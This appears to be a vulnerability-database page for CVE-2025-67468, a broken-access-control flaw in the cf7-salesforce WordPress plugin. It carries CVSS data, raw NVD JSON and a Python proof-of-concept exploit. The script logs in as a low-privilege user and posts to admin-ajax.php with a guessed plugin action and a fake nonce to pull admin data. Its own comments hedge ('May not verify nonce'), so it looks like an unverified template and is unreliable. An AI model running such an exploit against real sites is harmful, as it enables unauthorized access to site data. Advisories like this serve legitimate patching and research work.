Security Vulnerability Report
中文
CVE-2025-67468 CVSS 4.3 MEDIUM

CVE-2025-67468

Published: 2025-12-09 16:18:23
Last Modified: 2026-04-27 17:16:42

Description

Missing Authorization vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms cf7-salesforce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms: from n/a through <= 1.4.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

cf7-salesforce (Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms) <= 1.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67468 PoC - Unauthorized Data Access # Affected: cf7-salesforce plugin <= 1.4.6 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" # Low privilege account PASSWORD = "user_password" def exploit(): """ This PoC demonstrates the Broken Access Control vulnerability. A low-privilege user can access admin-only functionality. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Step 2: Access admin-only endpoint without proper authorization # This endpoint should require admin privileges but doesn't check permissions admin_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'cf7_salesforce_get_data', # Plugin AJAX action 'nonce': 'exploit_without_nonce', # May not verify nonce 'user_id': '1' # Target admin user ID } response = session.post(admin_endpoint, data=exploit_data) if response.status_code == 200: print(f"[+] Exploit successful! Retrieved data: {response.text}") print("[+] Low-privilege user accessed admin functionality") else: print("[-] Exploit failed or target not vulnerable") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67468", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:22.947", "lastModified": "2026-04-27T17:16:42.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms cf7-salesforce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms: from n/a through <= 1.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cf7-salesforce/vulnerability/wordpress-integration-for-salesforce-and-contact-form-7-wpforms-elementor-formidable-ninja-forms-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}